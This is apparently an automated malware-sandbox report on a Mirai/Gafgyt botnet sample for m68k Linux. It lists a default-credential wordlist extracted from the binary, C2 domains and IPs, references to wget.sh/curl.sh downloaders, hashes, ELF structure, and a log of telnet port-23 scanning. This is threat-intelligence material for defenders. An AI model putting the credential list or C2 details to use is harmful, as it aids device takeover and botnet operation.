hardFootballpornsexycamarofalconwhorebigdogChongqingcuntmartin12121212bitchcheeseHustonsecretpassword12345
                Source: rep.m68k.elf, 6240.1.00007ffc8e14a000.00007ffc8e16b000.rw-.sdmp, rep.m68k.elf, 6244.1.00007ffc8e14a000.00007ffc8e16b000.rw-.sdmp, rep.m68k.elf, 6246.1.00007ffc8e14a000.00007ffc8e16b000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-m68k/tmp/rep.m68k.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/rep.m68k.elf
                Source: rep.m68k.elf, 6240.1.00005558537c4000.0000555853849000.rw-.sdmp, rep.m68k.elf, 6244.1.00005558537c4000.0000555853849000.rw-.sdmp, rep.m68k.elf, 6246.1.00005558537c4000.0000555853849000.rw-.sdmpBinary or memory string: r|SXUPp|SXU!/etc/qemu-binfmt/m68k

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: rep.m68k.elf, type: SAMPLE
                Source: Yara matchFile source: 6246.1.00007fe3bc001000.00007fe3bc019000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6244.1.00007fe3bc001000.00007fe3bc019000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6240.1.00007fe3bc001000.00007fe3bc019000.r-x.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: rep.m68k.elf, type: SAMPLE
                Source: Yara matchFile source: 6246.1.00007fe3bc001000.00007fe3bc019000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6244.1.00007fe3bc001000.00007fe3bc019000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: 6240.1.00007fe3bc001000.00007fe3bc019000.r-x.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Scripting
                Path InterceptionDirect Volume AccessOS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network Medium1
                Service Stop
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
                Application Layer Protocol
                Traffic DuplicationData Destruction
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1611387 Sample: rep.m68k.elf Startdate: 10/02/2025 Architecture: LINUX Score: 76 25 thekittler.ru. [malformed] 2->25 27 newkittler.ru. [malformed] 2->27 29 50 other IPs or domains 2->29 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected Mirai 2->35 37 Connects to many ports of the same IP (likely port scanning) 2->37 8 rep.m68k.elf 2->8         started        10 xfce4-session xfdesktop 2->10         started        12 xfce4-session xfce4-panel 2->12         started        14 12 other processes 2->14 signatures3 39 Sends malformed DNS queries 27->39 process4 process5 16 rep.m68k.elf 8->16         started        process6 18 rep.m68k.elf 16->18         started        21 rep.m68k.elf 16->21         started        23 rep.m68k.elf 16->23         started        signatures7 31 Sample tries to kill multiple processes (SIGKILL) 18->31
                SourceDetectionScannerLabelLink
                rep.m68k.elf39%ReversingLabsLinux.Backdoor.Gafgyt
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                cuttiecats.ru
                185.93.89.106
                truefalse
                  high
                  polizei.su
                  185.93.89.106
                  truetrue
                    unknown
                    mykittler.ru
                    185.93.89.106
                    truefalse
                      high
                      cats-master.ru
                      185.93.89.106
                      truefalse
                        high
                        qittler.ru. [malformed]
                        unknown
                        unknownfalse
                          high
                          gokittler.ru. [malformed]
                          unknown
                          unknowntrue
                            unknown
                            kittler.ru. [malformed]
                            unknown
                            unknownfalse
                              high
                              cats-master.ru. [malformed]
                              unknown
                              unknowntrue
                                unknown
                                polizei.su. [malformed]
                                unknown
                                unknownfalse
                                  high
                                  thekittler.ru. [malformed]
                                  unknown
                                  unknowntrue
                                    unknown
                                    newkittler.ru. [malformed]
                                    unknown
                                    unknowntrue
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      http:///wget.shrep.m68k.elffalse
                                        high
                                        http:///curl.shrep.m68k.elffalse
                                          high
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          117.200.252.5
                                          unknownIndia
                                          9829BSNL-NIBNationalInternetBackboneINfalse
                                          196.137.119.207
                                          unknownEgypt
                                          36935Vodafone-EGfalse
                                          176.0.18.55
                                          unknownGermany
                                          12638AS12638DuesseldorfDEfalse
                                          30.34.11.73
                                          unknownUnited States
                                          7922COMCAST-7922USfalse
                                          210.41.190.107
                                          unknownChina
                                          4538ERX-CERNET-BKBChinaEducationandResearchNetworkCenterfalse
                                          19.193.139.119
                                          unknownUnited States
                                          3MIT-GATEWAYSUSfalse
                                          13.127.161.233
                                          unknownUnited States
                                          16509AMAZON-02USfalse
                                          112.227.42.31
                                          unknownChina
                                          4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                          58.88.67.98
                                          unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                                          152.176.34.128
                                          unknownUnited States
                                          701UUNETUSfalse
                                          156.192.65.183
                                          unknownEgypt
                                          8452TE-ASTE-ASEGfalse
                                          214.222.106.143
                                          unknownUnited States
                                          721DNIC-ASBLK-00721-00726USfalse
                                          45.97.100.58
                                          unknownEgypt
                                          37069MOBINILEGfalse
                                          210.204.139.32
                                          unknownKorea Republic of
                                          4766KIXS-AS-KRKoreaTelecomKRfalse
                                          185.82.7.101
                                          unknownGermany
                                          201214P3COMDEfalse
                                          15.235.205.38
                                          unknownUnited States
                                          71HP-INTERNET-ASUSfalse
                                          93.26.209.182
                                          unknownFrance
                                          15557LDCOMNETFRfalse
                                          193.144.213.93
                                          unknownSpain
                                          766REDIRISRedIRISAutonomousSystemESfalse
                                          183.251.67.12
                                          unknownChina
                                          9808CMNET-GDGuangdongMobileCommunicationCoLtdCNfalse
                                          74.243.8.166
                                          unknownUnited States
                                          19108SUDDENLINK-COMMUNICATIONSUSfalse
                                          91.189.91.43
                                          unknownUnited Kingdom
                                          41231CANONICAL-ASGBfalse
                                          24.142.234.236
                                          unknownUnited States
                                          11426TWC-11426-CAROLINASUSfalse
                                          91.189.91.42
                                          unknownUnited Kingdom
                                          41231CANONICAL-ASGBfalse
                                          62.184.16.178
                                          unknownEuropean Union
                                          34456RIALCOM-ASRUfalse
                                          132.255.181.26
                                          unknownBrazil
                                          263040HYPERTELECOMBRfalse
                                          185.93.89.106
                                          cuttiecats.ruUnited Kingdom
                                          200861TS-EMEA-ASNGBfalse
                                          93.40.252.106
                                          unknownItaly
                                          12874FASTWEBITfalse
                                          53.90.244.177
                                          unknownGermany
                                          31399DAIMLER-ASITIGNGlobalNetworkDEfalse
                                          195.98.250.167
                                          unknownFrance
                                          2200FR-RENATERReseauNationaldetelecommunicationspourlaTecfalse
                                          26.225.250.89
                                          unknownUnited States
                                          7922COMCAST-7922USfalse
                                          109.202.202.202
                                          unknownSwitzerland
                                          13030INIT7CHfalse
                                          122.48.91.69
                                          unknownChina
                                          4847CNIX-APChinaNetworksInter-ExchangeCNfalse
                                          90.36.37.183
                                          unknownFrance
                                          3215FranceTelecom-OrangeFRfalse
                                          6.103.233.186
                                          unknownUnited States
                                          3356LEVEL3USfalse
                                          74.157.102.227
                                          unknownUnited States
                                          7922COMCAST-7922USfalse
                                          144.45.169.118
                                          unknownUnited States
                                          1761TDIR-CAPNETUSfalse
                                          113.208.61.251
                                          unknownJapan17950SAINET-ASSaiNetJPfalse
                                          1.55.143.238
                                          unknownViet Nam
                                          18403FPT-AS-APTheCorporationforFinancingPromotingTechnolofalse
                                          172.109.115.154
                                          unknownUnited States
                                          5650FRONTIER-FRTRUSfalse
                                          138.58.247.108
                                          unknownUnited States
                                          2611BELNETBEfalse
                                          23.161.186.251
                                          unknownReserved
                                          396262FSO-ASNUSfalse
                                          98.171.5.218
                                          unknownUnited States
                                          22773ASN-CXA-ALL-CCI-22773-RDCUSfalse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          91.189.91.43na.elfGet hashmaliciousPrometeiBrowse
                                            mips.elfGet hashmaliciousMiraiBrowse
                                              arm7.elfGet hashmaliciousMiraiBrowse
                                                dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                  dlr.arm5.elfGet hashmaliciousUnknownBrowse
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                      na.elfGet hashmaliciousPrometeiBrowse
                                                        klfarm.elfGet hashmaliciousUnknownBrowse
                                                          kflarm7.elfGet hashmaliciousUnknownBrowse
                                                            bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                              91.189.91.42na.elfGet hashmaliciousPrometeiBrowse
                                                                mips.elfGet hashmaliciousMiraiBrowse
                                                                  arm7.elfGet hashmaliciousMiraiBrowse
                                                                    dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                                      dlr.arm5.elfGet hashmaliciousUnknownBrowse
                                                                        na.elfGet hashmaliciousPrometeiBrowse
                                                                          na.elfGet hashmaliciousPrometeiBrowse
                                                                            klfarm.elfGet hashmaliciousUnknownBrowse
                                                                              kflarm7.elfGet hashmaliciousUnknownBrowse
                                                                                bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  mykittler.rurep.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 156.229.232.99
                                                                                  cuttiecats.rumips.elfGet hashmaliciousMiraiBrowse
                                                                                  • 185.93.89.106
                                                                                  rep.arm5.elfGet hashmaliciousUnknownBrowse
                                                                                  • 156.229.232.99
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  Vodafone-EGz0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                                  • 196.134.222.189
                                                                                  z0r0.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                  • 196.137.44.11
                                                                                  botx.x86.elfGet hashmaliciousMiraiBrowse
                                                                                  • 196.133.156.136
                                                                                  spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 105.199.49.149
                                                                                  mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 196.154.34.52
                                                                                  jklsh4.elfGet hashmaliciousUnknownBrowse
                                                                                  • 196.135.112.207
                                                                                  nabspc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 196.143.152.176
                                                                                  nklm68k.elfGet hashmaliciousUnknownBrowse
                                                                                  • 196.129.66.91
                                                                                  telnet.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                  • 196.156.41.198
                                                                                  sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 196.159.107.177
                                                                                  COMCAST-7922USmips.elfGet hashmaliciousMiraiBrowse
                                                                                  • 28.225.89.160
                                                                                  arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 28.43.233.53
                                                                                  botnet.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 73.72.242.120
                                                                                  botnet.arm5.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 25.75.192.159
                                                                                  botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 70.91.50.134
                                                                                  botnet.mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 74.146.251.248
                                                                                  botnet.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 73.131.237.137
                                                                                  botnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 96.153.163.68
                                                                                  mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 65.34.207.181
                                                                                  mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 173.8.91.177
                                                                                  BSNL-NIBNationalInternetBackboneINbotnet.spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 117.229.79.68
                                                                                  Hgf.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                  • 117.255.236.158
                                                                                  Fantazy.mpsl.elfGet hashmaliciousUnknownBrowse
                                                                                  • 117.244.28.53
                                                                                  botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 218.248.156.98
                                                                                  .Sarm5.elfGet hashmaliciousMiraiBrowse
                                                                                  • 61.1.72.2
                                                                                  m68k.elfGet hashmaliciousUnknownBrowse
                                                                                  • 59.92.224.229
                                                                                  nabmips.elfGet hashmaliciousUnknownBrowse
                                                                                  • 59.96.216.169
                                                                                  jklppc.elfGet hashmaliciousUnknownBrowse
                                                                                  • 45.116.182.254
                                                                                  nabx86.elfGet hashmaliciousUnknownBrowse
                                                                                  • 59.91.135.93
                                                                                  nabarm7.elfGet hashmaliciousUnknownBrowse
                                                                                  • 117.238.1.255
                                                                                  AS12638DuesseldorfDEsora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                  • 176.4.86.132
                                                                                  m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 176.6.179.181
                                                                                  sh4.elfGet hashmaliciousUnknownBrowse
                                                                                  • 176.0.145.23
                                                                                  arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 176.1.223.122
                                                                                  Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                  • 176.2.98.205
                                                                                  156.229.229.101-arm-2025-01-24T01_03_02.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 212.23.120.8
                                                                                  armGet hashmaliciousUnknownBrowse
                                                                                  • 176.5.95.7
                                                                                  154.213.189.141-x86-2025-01-21T03_19_07.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                  • 176.0.157.58
                                                                                  arm4.elfGet hashmaliciousUnknownBrowse
                                                                                  • 176.0.169.22
                                                                                  fuckunix.mips.elfGet hashmaliciousMiraiBrowse
                                                                                  • 176.0.121.14
                                                                                  No context
                                                                                  No context
                                                                                  No created / dropped files found
                                                                                  File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                                                                  Entropy (8bit):6.32834815245489
                                                                                  TrID:
                                                                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                  File name:rep.m68k.elf
                                                                                  File size:97'920 bytes
                                                                                  MD5:cfff79e21c17348e5376bc67693f5f76
                                                                                  SHA1:5430fb02aa571e0ad3982a8a97e37f3b43e0afb9
                                                                                  SHA256:fa6e131d99e29db4cea6dcbd8318782577338bf5f85ec0135d2b592761cec86c
                                                                                  SHA512:421208df0b89f18be2bb336f7e76f7bd6eedbeca12fb97a8ddec07da24bb22c108544b3a03d7ecf017271cdf671d707614351f58a3c2975279096a5c3f9f36f2
                                                                                  SSDEEP:1536:NjKEkAvbU05LilTr5InROMEMgP8hzz/AxfThnchyeE/Z2OFDsyjKPSq:NjKdywlqnRDLgY/8hchZuQGzq
                                                                                  TLSH:00A3E74E680199ECFC0AC6B642164F18E9A47A157F714E6BF16AFBF65C210E0DC1EF42
                                                                                  File Content Preview:.ELF.......................D...4..|......4. ...(......................y...y....... .......y...............4....... .dt.Q............................NV..a....da...M.N^NuNV..J9....f>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy..y.N.X.........N^NuNV..N^NuN

                                                                                  ELF header

                                                                                  Class:ELF32
                                                                                  Data:2's complement, big endian
                                                                                  Version:1 (current)
                                                                                  Machine:MC68000
                                                                                  Version Number:0x1
                                                                                  Type:EXEC (Executable file)
                                                                                  OS/ABI:UNIX - System V
                                                                                  ABI Version:0
                                                                                  Entry Point Address:0x80000144
                                                                                  Flags:0x0
                                                                                  ELF Header Size:52
                                                                                  Program Header Offset:52
                                                                                  Program Header Size:32
                                                                                  Number of Program Headers:3
                                                                                  Section Header Offset:97520
                                                                                  Section Header Size:40
                                                                                  Number of Section Headers:10
                                                                                  Header String Table Index:9
                                                                                  NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                  NULL0x00x00x00x00x0000
                                                                                  .initPROGBITS0x800000940x940x140x00x6AX002
                                                                                  .textPROGBITS0x800000a80xa80x14dbe0x00x6AX004
                                                                                  .finiPROGBITS0x80014e660x14e660xe0x00x6AX002
                                                                                  .rodataPROGBITS0x80014e740x14e740x2b320x00x2A002
                                                                                  .ctorsPROGBITS0x800199ac0x179ac0x80x00x3WA004
                                                                                  .dtorsPROGBITS0x800199b40x179b40x80x00x3WA004
                                                                                  .dataPROGBITS0x800199c00x179c00x2f00x00x3WA004
                                                                                  .bssNOBITS0x80019cb00x17cb00x319c0x00x3WA004
                                                                                  .shstrtabSTRTAB0x00x17cb00x3e0x00x0001
                                                                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                  LOAD0x00x800000000x800000000x179a60x179a66.35830x5R E0x2000.init .text .fini .rodata
                                                                                  LOAD0x179ac0x800199ac0x800199ac0x3040x34a01.99090x6RW 0x2000.ctors .dtors .data .bss
                                                                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Feb 10, 2025 20:43:15.162802935 CET5921223192.168.2.2393.26.209.182
                                                                                  Feb 10, 2025 20:43:15.167454958 CET4778623192.168.2.23122.48.91.69
                                                                                  Feb 10, 2025 20:43:15.167578936 CET235921293.26.209.182192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.167696953 CET5921223192.168.2.2393.26.209.182
                                                                                  Feb 10, 2025 20:43:15.170881987 CET3406223192.168.2.236.103.233.186
                                                                                  Feb 10, 2025 20:43:15.172247887 CET2347786122.48.91.69192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.172290087 CET4778623192.168.2.23122.48.91.69
                                                                                  Feb 10, 2025 20:43:15.174076080 CET3970238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:15.175441027 CET5669623192.168.2.2323.161.186.251
                                                                                  Feb 10, 2025 20:43:15.175687075 CET23340626.103.233.186192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.175745964 CET3406223192.168.2.236.103.233.186
                                                                                  Feb 10, 2025 20:43:15.178843975 CET3824139702185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.179133892 CET3970238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:15.180177927 CET235669623.161.186.251192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.180222034 CET5669623192.168.2.2323.161.186.251
                                                                                  Feb 10, 2025 20:43:15.186786890 CET5951023192.168.2.231.55.143.238
                                                                                  Feb 10, 2025 20:43:15.190005064 CET3970238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:15.191579103 CET23595101.55.143.238192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.191632986 CET5951023192.168.2.231.55.143.238
                                                                                  Feb 10, 2025 20:43:15.193795919 CET3937023192.168.2.23193.144.213.93
                                                                                  Feb 10, 2025 20:43:15.194785118 CET3824139702185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.194833040 CET3970238241192.168.2.23185.93.89.106
                                                                                  Feb 10, 2025 20:43:15.198569059 CET2339370193.144.213.93192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.198613882 CET3937023192.168.2.23193.144.213.93
                                                                                  Feb 10, 2025 20:43:15.199646950 CET3824139702185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.200807095 CET4378223192.168.2.23156.192.65.183
                                                                                  Feb 10, 2025 20:43:15.205645084 CET2343782156.192.65.183192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.205873966 CET4378223192.168.2.23156.192.65.183
                                                                                  Feb 10, 2025 20:43:15.206274033 CET4028623192.168.2.2319.193.139.119
                                                                                  Feb 10, 2025 20:43:15.211038113 CET234028619.193.139.119192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.211076021 CET5435823192.168.2.2374.157.102.227
                                                                                  Feb 10, 2025 20:43:15.211083889 CET4028623192.168.2.2319.193.139.119
                                                                                  Feb 10, 2025 20:43:15.215826988 CET235435874.157.102.227192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.215929031 CET5435823192.168.2.2374.157.102.227
                                                                                  Feb 10, 2025 20:43:15.216715097 CET5027623192.168.2.23112.227.42.31
                                                                                  Feb 10, 2025 20:43:15.221479893 CET2350276112.227.42.31192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.221847057 CET5027623192.168.2.23112.227.42.31
                                                                                  Feb 10, 2025 20:43:15.224972010 CET5186423192.168.2.2374.243.8.166
                                                                                  Feb 10, 2025 20:43:15.229751110 CET235186474.243.8.166192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.229891062 CET5186423192.168.2.2374.243.8.166
                                                                                  Feb 10, 2025 20:43:15.231574059 CET4988423192.168.2.2390.36.37.183
                                                                                  Feb 10, 2025 20:43:15.236336946 CET234988490.36.37.183192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.236377954 CET4988423192.168.2.2390.36.37.183
                                                                                  Feb 10, 2025 20:43:15.236462116 CET3572023192.168.2.23185.82.7.101
                                                                                  Feb 10, 2025 20:43:15.240345955 CET4568623192.168.2.2315.235.205.38
                                                                                  Feb 10, 2025 20:43:15.241306067 CET2335720185.82.7.101192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.241343021 CET3572023192.168.2.23185.82.7.101
                                                                                  Feb 10, 2025 20:43:15.242978096 CET5843423192.168.2.23144.45.169.118
                                                                                  Feb 10, 2025 20:43:15.245099068 CET234568615.235.205.38192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.245150089 CET4568623192.168.2.2315.235.205.38
                                                                                  Feb 10, 2025 20:43:15.246170044 CET5434223192.168.2.23113.208.61.251
                                                                                  Feb 10, 2025 20:43:15.247737885 CET2358434144.45.169.118192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.247988939 CET5843423192.168.2.23144.45.169.118
                                                                                  Feb 10, 2025 20:43:15.250999928 CET2354342113.208.61.251192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.255662918 CET5434223192.168.2.23113.208.61.251
                                                                                  Feb 10, 2025 20:43:15.299352884 CET4863023192.168.2.2353.90.244.177
                                                                                  Feb 10, 2025 20:43:15.304136992 CET234863053.90.244.177192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.304199934 CET4863023192.168.2.2353.90.244.177
                                                                                  Feb 10, 2025 20:43:15.305782080 CET3779223192.168.2.2330.34.11.73
                                                                                  Feb 10, 2025 20:43:15.310652018 CET233779230.34.11.73192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.310713053 CET3779223192.168.2.2330.34.11.73
                                                                                  Feb 10, 2025 20:43:15.313369036 CET5882623192.168.2.2324.142.234.236
                                                                                  Feb 10, 2025 20:43:15.318128109 CET235882624.142.234.236192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.318175077 CET5882623192.168.2.2324.142.234.236
                                                                                  Feb 10, 2025 20:43:15.318258047 CET4092823192.168.2.2313.127.161.233
                                                                                  Feb 10, 2025 20:43:15.323033094 CET234092813.127.161.233192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.323123932 CET4092823192.168.2.2313.127.161.233
                                                                                  Feb 10, 2025 20:43:15.325125933 CET4302223192.168.2.23132.255.181.26
                                                                                  Feb 10, 2025 20:43:15.329915047 CET2343022132.255.181.26192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.329999924 CET4302223192.168.2.23132.255.181.26
                                                                                  Feb 10, 2025 20:43:15.331413031 CET3347623192.168.2.2362.184.16.178
                                                                                  Feb 10, 2025 20:43:15.336174965 CET233347662.184.16.178192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.336241961 CET4110023192.168.2.2398.171.5.218
                                                                                  Feb 10, 2025 20:43:15.336246014 CET3347623192.168.2.2362.184.16.178
                                                                                  Feb 10, 2025 20:43:15.341015100 CET234110098.171.5.218192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.341063023 CET4110023192.168.2.2398.171.5.218
                                                                                  Feb 10, 2025 20:43:15.347814083 CET4314623192.168.2.23210.204.139.32
                                                                                  Feb 10, 2025 20:43:15.352582932 CET2343146210.204.139.32192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.352901936 CET4314623192.168.2.23210.204.139.32
                                                                                  Feb 10, 2025 20:43:15.436139107 CET4882823192.168.2.23138.58.247.108
                                                                                  Feb 10, 2025 20:43:15.440954924 CET2348828138.58.247.108192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.441008091 CET4882823192.168.2.23138.58.247.108
                                                                                  Feb 10, 2025 20:43:15.475704908 CET3894623192.168.2.23196.137.119.207
                                                                                  Feb 10, 2025 20:43:15.480479002 CET2338946196.137.119.207192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.480525017 CET3894623192.168.2.23196.137.119.207
                                                                                  Feb 10, 2025 20:43:15.487123013 CET4724623192.168.2.2358.88.67.98
                                                                                  Feb 10, 2025 20:43:15.494554996 CET234724658.88.67.98192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.495332003 CET4724623192.168.2.2358.88.67.98
                                                                                  Feb 10, 2025 20:43:15.519862890 CET3764023192.168.2.23172.109.115.154
                                                                                  Feb 10, 2025 20:43:15.524617910 CET2337640172.109.115.154192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.524679899 CET3764023192.168.2.23172.109.115.154
                                                                                  Feb 10, 2025 20:43:15.538214922 CET3987023192.168.2.23152.176.34.128
                                                                                  Feb 10, 2025 20:43:15.542984962 CET2339870152.176.34.128192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.543030024 CET3987023192.168.2.23152.176.34.128
                                                                                  Feb 10, 2025 20:43:15.561470032 CET3648023192.168.2.2393.40.252.106
                                                                                  Feb 10, 2025 20:43:15.566569090 CET233648093.40.252.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.566646099 CET3648023192.168.2.2393.40.252.106
                                                                                  Feb 10, 2025 20:43:15.577122927 CET3649823192.168.2.2345.97.100.58
                                                                                  Feb 10, 2025 20:43:15.581873894 CET233649845.97.100.58192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.582715988 CET3649823192.168.2.2345.97.100.58
                                                                                  Feb 10, 2025 20:43:15.586108923 CET4853223192.168.2.23183.251.67.12
                                                                                  Feb 10, 2025 20:43:15.590913057 CET2348532183.251.67.12192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.590997934 CET4853223192.168.2.23183.251.67.12
                                                                                  Feb 10, 2025 20:43:15.592406034 CET6096023192.168.2.23195.98.250.167
                                                                                  Feb 10, 2025 20:43:15.597134113 CET2360960195.98.250.167192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.597199917 CET6096023192.168.2.23195.98.250.167
                                                                                  Feb 10, 2025 20:43:15.601149082 CET4941023192.168.2.23117.200.252.5
                                                                                  Feb 10, 2025 20:43:15.606251001 CET2349410117.200.252.5192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.606306076 CET4941023192.168.2.23117.200.252.5
                                                                                  Feb 10, 2025 20:43:15.607713938 CET5604223192.168.2.2326.225.250.89
                                                                                  Feb 10, 2025 20:43:15.612490892 CET235604226.225.250.89192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.612552881 CET5604223192.168.2.2326.225.250.89
                                                                                  Feb 10, 2025 20:43:15.613883972 CET5840623192.168.2.23214.222.106.143
                                                                                  Feb 10, 2025 20:43:15.618695021 CET2358406214.222.106.143192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.618763924 CET5840623192.168.2.23214.222.106.143
                                                                                  Feb 10, 2025 20:43:15.625191927 CET5572423192.168.2.23176.0.18.55
                                                                                  Feb 10, 2025 20:43:15.629983902 CET2355724176.0.18.55192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.630040884 CET5572423192.168.2.23176.0.18.55
                                                                                  Feb 10, 2025 20:43:15.648180962 CET4881623192.168.2.23210.41.190.107
                                                                                  Feb 10, 2025 20:43:15.652977943 CET2348816210.41.190.107192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.653074026 CET4881623192.168.2.23210.41.190.107
                                                                                  Feb 10, 2025 20:43:15.829569101 CET3824139702185.93.89.106192.168.2.23
                                                                                  Feb 10, 2025 20:43:15.829689980 CET3970238241192.168.2.23185.93.89.106
